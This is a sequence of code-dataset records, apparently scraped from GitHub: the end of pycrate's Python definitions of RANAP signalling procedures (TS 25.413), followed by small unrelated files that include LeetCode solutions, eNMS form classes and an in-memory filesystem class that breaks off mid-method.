Extensions:\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.directInformationTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPDirectInformationTransferRNC(RANAPConlessSigProc):\n \"\"\"Direct Information Transfer: TS 25.413, section 8.34\n \n RNC-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 86: GlobalRNC_ID (O)\n - 96: GlobalCN_ID (O)\n - 126: InterSystemInformationTransferType (O)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.directInformationTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPUplinkInformationTransfer(RANAPConlessSigProc):\n \"\"\"Uplink Information Transfer: TS 25.413, section 8.35\n \n RNC-initiated\n request-accept, request-reject\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 86: GlobalRNC_ID (M)\n - 123: InformationTransferType (C)\n - 136: InformationExchangeID (M)\n - 137: InformationExchangeType (M)\n - 139: InformationRequestType (C)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n SuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 9: CriticalityDiagnostics (O)\n - 96: GlobalCN_ID (O)\n - 136: InformationExchangeID (M)\n - 138: InformationRequested (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n - 96: GlobalCN_ID (O)\n - 136: InformationExchangeID (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.uplinkInformationExchange\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPMBSMSessionStart(RANAPSigProc):\n \"\"\"MBMS Session Start: TS 25.413, section 8.36\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 79: IuSignallingConnectionIdentifier (M)\n - 96: GlobalCN_ID (O)\n - 135: FrequenceLayerConvergenceFlag (O)\n - 143: MBMSBearerServiceType (M)\n - 145: MBMSServiceArea (M)\n - 146: MBMSSessionDuration (M)\n - 147: MBMSSessionIdentity (O)\n - 148: PDP_TypeInformation (O)\n - 149: RAB_Parameters (M)\n - 150: RAListofIdleModeUEs (O)\n - 153: TMGI (M)\n - 157: MBMSSessionRepetitionNumber (O)\n - 163: TimeToMBMSDataTransfer (M)\n Extensions:\n - 169: MBMSCountingInformation (O)\n - 201: MBMSSynchronisationInformation (O)\n - 238: PDP_TypeInformation_extension (O)\n - 276: Session_Re_establishment_Indicator (O)\n SuccessfulOutcome:\n IEs:\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 154: TransportLayerInformation (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSSessionStart\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom 
encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPMBMSSessionUpdate(RANAPSigProc):\n \"\"\"MBMS Session Update: TS 25.413, section 8.37\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 134: DeltaRAListofIdleModeUEs (M)\n - 152: SessionUpdateID (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 152: SessionUpdateID (M)\n - 154: TransportLayerInformation (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n - 152: SessionUpdateID (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSSessionUpdate\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPMBMSSessionStop(RANAPSigProc):\n \"\"\"MBMS Session Stop: TS 25.413, section 8.38\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 144: MBMSCNDe_Registration (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSSessionStop\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPMBMSUELinking(RANAPSigProc):\n \"\"\"MBMS UE Linking: TS 25.413, section 8.39\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 141: JoinedMBMSBearerService_IEs (O)\n - 142: LeftMBMSBearerService_IEs (O)\n Extensions:\n None\n Outcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 155: UnsuccessfulLinking_IEs (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSUELinking\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPMBMSRegistration(RANAPSigProc):\n \"\"\"MBMS Registration: TS 25.413, section 8.40\n \n RNC-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 86: GlobalRNC_ID (O)\n - 132: APN (C)\n - 140: IPMulticastAddress (C)\n - 151: MBMSRegistrationRequestType (M)\n - 153: TMGI (M)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 96: GlobalCN_ID (O)\n - 153: TMGI (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n - 96: GlobalCN_ID (O)\n - 153: TMGI (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSRegistration\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPMBMSCNDeregistration(RANAPSigProc):\n \"\"\"MBMS CN Deregistration: TS 25.413, section 8.41\n \n CN-initiated\n request-response\n 
connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 96: GlobalCN_ID (O)\n - 153: TMGI (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 4: Cause (O)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (M)\n - 153: TMGI (M)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSCNDe_Registration\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPMBMSRABEstablishmentInd(RANAPSigProc):\n \"\"\"MBMS RAB Establishement Indication: TS 25.413, section 8.42\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 154: TransportLayerInformation (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSRABEstablishmentIndication\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPMBMSRABRelease(RANAPSigProc):\n \"\"\"MBMS RAB Release: TS 25.413, section 8.43\n \n RNC-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.mBMSRABRelease\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPEnhancedRelocationComplete(RANAPSigProc):\n \"\"\"Enhanced Relocation Complete: TS 25.413, section 8.44\n \n RNC-initiated\n request-accept, request\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 79: IuSignallingConnectionIdentifier (M)\n - 188: RAB_SetupList_EnhancedRelocCompleteReq (O)\n - 196: IuSignallingConnectionIdentifier (M)\n - 212: GlobalRNC_ID (M)\n - 213: ExtendedRNC_ID (O)\n - 222: GlobalRNC_ID (M)\n - 223: ExtendedRNC_ID (O)\n Extensions:\n - 5: ChosenEncryptionAlgorithm (O)\n - 6: ChosenIntegrityProtectionAlgorithm (O)\n - 203: CSG_Id (O)\n - 235: Cell_Access_Mode (O)\n - 250: HigherBitratesThan16MbpsFlag (O)\n - 262: TunnelInformation (O)\n - 275: LHN_ID (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 190: RAB_SetupList_EnhancedRelocCompleteRes (O)\n - 210: RAB_ToBeReleasedList_EnhancedRelocCompleteRes (O)\n Extensions:\n - 233: UE_AggregateMaximumBitRate (O)\n - 234: CSG_Membership_Status (O)\n - 239: MSISDN (O)\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.enhancedRelocationComplete\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPEnhancedRelocationCompleteConfirm(RANAPSigProc):\n \"\"\"Enhanced Relocation Complete Confirm: TS 25.413, section 8.45\n \n 
RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 35: RAB_FailedList (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.enhancedRelocationCompleteConfirm\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPSRVCCPreparation(RANAPSigProc):\n \"\"\"SRVCC Preparation: TS 25.413, section 8.46\n \n RNC-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n None\n Extensions:\n None\n Outcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 224: EncryptionKey (M)\n - 225: IntegrityProtectionKey (M)\n - 227: SRVCC_Information (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.sRVCCPreparation\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPUERadioCapabilityMatch(RANAPSigProc):\n \"\"\"UE Radio Capability Match: TS 25.413, section 8.47\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n None\n Extensions:\n None\n Outcome:\n IEs:\n - 258: VoiceSupportMatchIndicator (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.ueRadioCapabilityMatch\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPUERegistrationQuery(RANAPSigProc):\n \"\"\"UE Registration Query: TS 25.413, section 8.48\n \n RNC-initiated\n request\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 23: PermanentNAS_UE_ID (M)\n - 79: IuSignallingConnectionIdentifier (M)\n Extensions:\n None\n Outcome:\n IEs:\n - 281: UERegistrationQueryResult (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.ueRegistrationQuery\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPRerouteNASRequest(RANAPSigProc):\n \"\"\"Reroute NAS Request: TS 25.413, section 8.49\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 286: SGSN_Group_Identity (M)\n - 287: P_TMSI (O)\n - 288: [OCTET STRING] (M)\n - 290: UE_Usage_Type (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.rerouteNASRequest\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPPrivateMessageRNC(RANAPSigProc):\n \"\"\"Private Message: TS 25.413\n \n RNC-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.privateMessage\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 
'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPPrivateMessageCN(RANAPSigProc):\n \"\"\"Private Message: TS 25.413\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.privateMessage\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\n# initializing all RANAP procedures classes\nRANAPRABAssignment.init()\nRANAPRABReleaseRequest.init()\nRANAPIuReleaseRequest.init()\nRANAPIuRelease.init()\nRANAPRelocationPreparation.init()\nRANAPRelocationResourceAllocation.init()\nRANAPRelocationDetect.init()\nRANAPRelocationComplete.init()\nRANAPRelocationCancel.init()\nRANAPSRNSContextTransfer.init()\nRANAPSRNSDataForwarding.init()\nRANAPSRNSContextForwardToCN.init()\nRANAPSRNSContextForwardToRNC.init()\nRANAPPaging.init()\nRANAPCommonID.init()\nRANAPCNInvokeTrace.init()\nRANAPSecurityModeControl.init()\nRANAPLocationReportingControl.init()\nRANAPLocationReport.init()\nRANAPDataVolumeReport.init()\nRANAPInitialUEMessage.init()\nRANAPDirectTransferCN.init()\nRANAPDirectTransferRNC.init()\nRANAPOverloadControlCN.init()\nRANAPOverloadControlRNC.init()\nRANAPResetCN.init()\nRANAPResetRNC.init()\nRANAPErrorIndConlessCN.init()\nRANAPErrorIndConlessRNC.init()\nRANAPErrorIndCN.init()\nRANAPErrorIndRNC.init()\nRANAPCNDeactivateTrace.init()\nRANAPResetResourceCN.init()\nRANAPResetResourceRNC.init()\nRANAPRABModificationRequest.init()\nRANAPLocationRelatedData.init()\nRANAPInformationTransfer.init()\nRANAPUESpecificInformation.init()\nRANAPDirectInformationTransferCN.init()\nRANAPDirectInformationTransferRNC.init()\nRANAPUplinkInformationTransfer.init()\nRANAPMBSMSessionStart.init()\nRANAPMBMSSessionUpdate.init()\nRANAPMBMSSessionStop.init()\nRANAPMBMSUELinking.init()\nRANAPMBMSRegistration.init()\nRANAPMBMSCNDeregistration.init()\nRANAPMBMSRABEstablishmentInd.init()\nRANAPMBMSRABRelease.init()\nRANAPEnhancedRelocationComplete.init()\nRANAPEnhancedRelocationCompleteConfirm.init()\nRANAPSRVCCPreparation.init()\nRANAPUERadioCapabilityMatch.init()\nRANAPUERegistrationQuery.init()\nRANAPRerouteNASRequest.init()\nRANAPPrivateMessageRNC.init()\nRANAPPrivateMessageCN.init()\n\n# RANAP RNC-initiated connection-oriented signalling procedures dispatcher\nRANAPProcRncDispatcher = {\n 2 : RANAPRelocationPreparation,\n 4 : RANAPRelocationCancel,\n 10 : RANAPRABReleaseRequest,\n 11 : RANAPIuReleaseRequest,\n 12 : RANAPRelocationDetect,\n 13 : RANAPRelocationComplete,\n 18 : RANAPLocationReport,\n 19 : RANAPInitialUEMessage,\n 20 : RANAPDirectTransferRNC,\n 22 : RANAPErrorIndRNC,\n 24 : RANAPSRNSContextForwardToCN,\n 25 : RANAPPrivateMessageRNC,\n 29 : RANAPRABModificationRequest,\n 39 : RANAPMBMSRegistration,\n 41 : RANAPMBMSRABEstablishmentInd,\n 42 : RANAPMBMSRABRelease,\n 43 : RANAPEnhancedRelocationComplete,\n 44 : RANAPEnhancedRelocationCompleteConfirm,\n 46 : RANAPSRVCCPreparation,\n 48 : RANAPUERegistrationQuery\n }\n\n# RANAP CN-initiated connection-oriented signalling procedures dispatcher\nRANAPProcCnDispatcher = {\n 0 : RANAPRABAssignment,\n 1 : RANAPIuRelease,\n 3 : RANAPRelocationResourceAllocation,\n 5 : RANAPSRNSContextTransfer,\n 6 : RANAPSecurityModeControl,\n 7 : RANAPDataVolumeReport,\n 15 : RANAPCommonID,\n 16 : RANAPCNInvokeTrace,\n 17 : RANAPLocationReportingControl,\n 20 : 
RANAPDirectTransferCN,\n 22 : RANAPErrorIndCN,\n 23 : RANAPSRNSDataForwarding,\n 24 : RANAPSRNSContextForwardToRNC,\n 25 : RANAPPrivateMessageCN,\n 26 : RANAPCNDeactivateTrace,\n 30 : RANAPLocationRelatedData,\n 32 : RANAPUESpecificInformation,\n 35 : RANAPMBSMSessionStart,\n 36 : RANAPMBMSSessionUpdate,\n 37 : RANAPMBMSSessionStop,\n 38 : RANAPMBMSUELinking,\n 40 : RANAPMBMSCNDeregistration,\n 47 : RANAPUERadioCapabilityMatch,\n 49 : RANAPRerouteNASRequest,\n }\n\n# RANAP RNC-initiated connection-less signalling procedures dispatcher\nRANAPConlessProcRncDispatcher = {\n 9 : RANAPResetRNC,\n 21 : RANAPOverloadControlRNC,\n 22 : RANAPErrorIndConlessRNC,\n 27 : RANAPResetResourceRNC,\n 33 : RANAPUplinkInformationTransfer,\n 34 : RANAPDirectInformationTransferRNC,\n }\n\n# RANAP CN-initiated connection-less signalling procedures dispatcher\nRANAPConlessProcCnDispacther = {\n 9 : RANAPResetCN,\n 14 : RANAPPaging,\n 21 : RANAPOverloadControlCN,\n 22 : RANAPErrorIndConlessCN,\n 27 : RANAPResetResourceCN,\n 31 : RANAPInformationTransfer,\n 34 : RANAPDirectInformationTransferCN,\n }\n\n","repo_name":"P1sec/pycrate","sub_path":"pycrate_corenet/ProcCNRanap.py","file_name":"ProcCNRanap.py","file_ext":"py","file_size_in_byte":90235,"program_lang":"python","lang":"en","doc_type":"code","stars":363,"dataset":"github-code","pt":"21"} +{"seq_id":"7551212374","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @return a ListNode\r\n def removeNthFromEnd(self, head, n):\r\n myhead = ListNode(0)\r\n myhead.next = head\r\n now_head = myhead\r\n last_head = myhead\r\n p = head\r\n i = 0\r\n while p:\r\n i += 1\r\n if i == n:\r\n last_head = now_head\r\n now_head = p\r\n i = 0\r\n p = p.next\r\n \r\n if i == n:\r\n last_head.next = last_head.next.next\r\n elif last_head == myhead and i == 0:\r\n return head.next\r\n else:\r\n for j in range(i):\r\n last_head = last_head.next\r\n last_head.next = last_head.next.next\r\n return head\r\n ","repo_name":"cbsheng/fun_acm","sub_path":"leetcode/Remove Nth Node From End of List.py","file_name":"Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23459778229","text":"class Solution(object):\n def myPow(self, x, n):\n \"\"\"\n :type x: float\n :type n: int\n :rtype: float\n \"\"\"\n flag = 0\n if n < 0:\n n = -n\n flag = 1\n res = self.power(x, n)\n return res if flag == 0 else 1/float(res)\n \n def power(self, x, n):\n if n == 0:\n return 1\n if n % 2 == 0:\n temp = self.power(x, n/2)\n return temp * temp\n else:\n temp = self.power(x, n/2)\n return x * temp * temp\n","repo_name":"ynyeh0221/LeetCode-II","sub_path":"50. Pow(x, n).py","file_name":"50. 
Pow(x, n).py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38125418904","text":"t = int(input())\nwhile t:\n t -= 1\n s = input()\n lens = len(s)\n if lens % 2 == 0 or s[0] == s[1]:\n print(\"NO\")\n else:\n s1 = s[::2]\n ok = True\n for i in range(lens//2 - 1):\n if s1[i] != s1[i+1]:\n ok = False\n break\n print(\"YES\" if ok else \"NO\")","repo_name":"Sudo248/Python-PTIT","sub_path":"so_xem_ke.py","file_name":"so_xem_ke.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13206418290","text":"from wtforms import BooleanField, HiddenField, IntegerField, SelectField, StringField\r\nfrom wtforms.validators import InputRequired\r\nfrom wtforms.widgets import TextArea\r\n\r\nfrom eNMS.forms import BaseForm, configure_relationships\r\nfrom eNMS.forms.fields import DateField, DictField, MultipleInstanceField\r\n\r\n\r\ndef configure_form(cls):\r\n cls.properties = (\"log_source\", \"log_content\")\r\n for property in (\"log_source\", \"log_content\"):\r\n setattr(cls, property, StringField(property))\r\n setattr(cls, property + \"_regex\", BooleanField(\"Regex\"))\r\n return cls\r\n\r\n\r\n@configure_form\r\nclass EventForm(BaseForm):\r\n template = \"event\"\r\n form_type = HiddenField(default=\"event\")\r\n id = HiddenField()\r\n name = StringField(\"Name\", [InputRequired()])\r\n services = MultipleInstanceField(\"Services\")\r\n\r\n\r\n@configure_relationships\r\nclass TaskForm(BaseForm):\r\n template = \"object\"\r\n form_type = HiddenField(default=\"task\")\r\n id = HiddenField()\r\n scheduling_mode = SelectField(\r\n \"Scheduling Mode\",\r\n choices=((\"cron\", \"Crontab Scheduling\"), (\"standard\", \"Standard Scheduling\")),\r\n )\r\n name = StringField(\"Name\", [InputRequired()])\r\n description = StringField(\"Description\")\r\n start_date = DateField(\"Start Date\")\r\n end_date = DateField(\"End Date\")\r\n frequency = IntegerField(\"Frequency\", default=0)\r\n frequency_unit = SelectField(\r\n \"Frequency Unit\",\r\n choices=(\r\n (\"seconds\", \"Seconds\"),\r\n (\"minutes\", \"Minutes\"),\r\n (\"hours\", \"Hours\"),\r\n (\"days\", \"Days\"),\r\n ),\r\n )\r\n crontab_expression = StringField(\"Crontab Expression\")\r\n payload = DictField(\"Payload\")\r\n\r\n def validate(self):\r\n valid_form = super().validate()\r\n no_date = self.scheduling_mode.data == \"standard\" and not self.start_date.data\r\n if no_date:\r\n self.start_date.errors.append(\"A start date must be set.\")\r\n no_cron_expression = (\r\n self.scheduling_mode.data == \"cron\" and not self.crontab_expression.data\r\n )\r\n if no_cron_expression:\r\n self.crontab_expression.errors.append(\"A crontab expression must be set.\")\r\n no_service = not self.service.data\r\n if no_service:\r\n self.service.errors.append(\"No service set.\")\r\n return valid_form and not any([no_date, no_cron_expression, no_service])\r\n\r\n\r\nclass ChangelogForm(BaseForm):\r\n template = \"object\"\r\n form_type = HiddenField(default=\"changelog\")\r\n id = HiddenField()\r\n severity = SelectField(\r\n \"Severity\",\r\n choices=(\r\n (\"debug\", \"Debug\"),\r\n (\"info\", \"Info\"),\r\n (\"warning\", \"Warning\"),\r\n (\"error\", \"Error\"),\r\n (\"critical\", \"Critical\"),\r\n ),\r\n )\r\n content = StringField(widget=TextArea(), render_kw={\"rows\": 
8})\r\n","repo_name":"arifh19/eNMS","sub_path":"eNMS/forms/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
{"seq_id":"8831186923","text":"from __future__ import annotations\n\nfrom typing import Callable\n\n\nclass Directory:\n    def __init__(self, name: str, parent: Directory, is_root=False):\n        self.is_root = is_root\n        self.name = name\n        self.parent = parent\n        # Prevent double //\n        if (is_root):\n            self.path = \"/\"\n        elif (parent.is_root):\n            self.path = parent.path + name\n        else:\n            self.path = parent.path + \"/\" + name\n        self.subfolders = {}\n        self.files = {}\n\n    # Create a sub directory under this directory\n    def new_subfolder(self, new_name: str) -> Directory:\n        d = Directory(new_name, self)\n        self.subfolders[new_name] = d\n        return d\n\n    # Create new file under this directory\n    def new_file(self, file_name: str) -> File:\n        f = File(file_name, self)\n        self.files[file_name] = f\n        return f\n\n    # Given an existing file, link it to this directory\n    def add_existing_file(self, file: File):\n        if (file is None):\n            return\n        self.files[file.name] = file\n        file.parent = self\n\n    def get_file(self, file_name: str) -> File:\n        if file_name in self.files.keys():\n            return self.files[file_name]\n        else:\n            return None\n\n    def get_subfolder(self, subfolder_name: str) -> Directory:\n        if subfolder_name in self.subfolders.keys():\n            return self.subfolders[subfolder_name]\n        else:\n            return None\n\n    # Removes subfolder, no-op if it doesn't exist.\n    def remove_subfolder(self, subfolder_name):\n        return self.subfolders.pop(subfolder_name, None)\n\n    # Removes file, no-op if it doesn't exist.\n    def remove_file(self, file_name: str) -> File:\n        return self.files.pop(file_name, None)\n\n    # Starting from this dir, invoke an arbitrary func on every folder & file\n    # + recursively on every subfolder\n    # Return the output of each type (file|folder) as two dicts where\n    # dict{key=file/folder-path, val=func output}\n    # Output = tuple(dict,dict) corresponding to file-output, folder-output\n\n    # e.g. Imagine a tree of / -> file1, dir1; \n    #           /dir1 -> file2\n    # e.g. Output: ({/file1->val1, /dir1/file2->val2} , {/dir1->val3})\n    # where the first dict is the output of all file invocations\n    # and the second dict is the output of all directory invocations\n
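    # (illustrative example, not in the original: with func = lambda node: node.name\n    # and args = [], the tree above returns\n    # ({'/file1': 'file1', '/dir1/file2': 'file2'}, {'/dir1': 'dir1'}))\n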
    def recurse_with_func(self, func: Callable, args: list) -> tuple[dict, dict]:\n        output_files = {}\n        output_folders = {}\n        for file in self.files.values():\n            output_files[file.get_path()] = func(file, *args)\n        for dir in self.subfolders.values():\n            output_folders[dir.path] = func(dir, *args)\n            recurse_output_files, recurse_output_folders = dir.recurse_with_func(\n                func, args)\n            # merge dicts; no worries about key conflict due to unique paths as keys\n            output_files = {**output_files, **recurse_output_files}\n            output_folders = {**output_folders, **recurse_output_folders}\n        return (output_files, output_folders)\n\n\nclass File:\n    def __init__(self, name: str, parent: Directory):\n        self.name = name\n        self.contents = \"\"\n        self.parent = parent\n        # TODO implement read/write lock logic\n        # Supports multiple open reads\n        self.read_handlers = set()\n        # Supports only 1 open write\n        self.write_handler = None\n\n    def get_path(self) -> str:\n        if self.parent.is_root:\n            return \"/\"+self.name\n        else:\n            return self.parent.path + \"/\" + self.name\n\n    def copy(self) -> 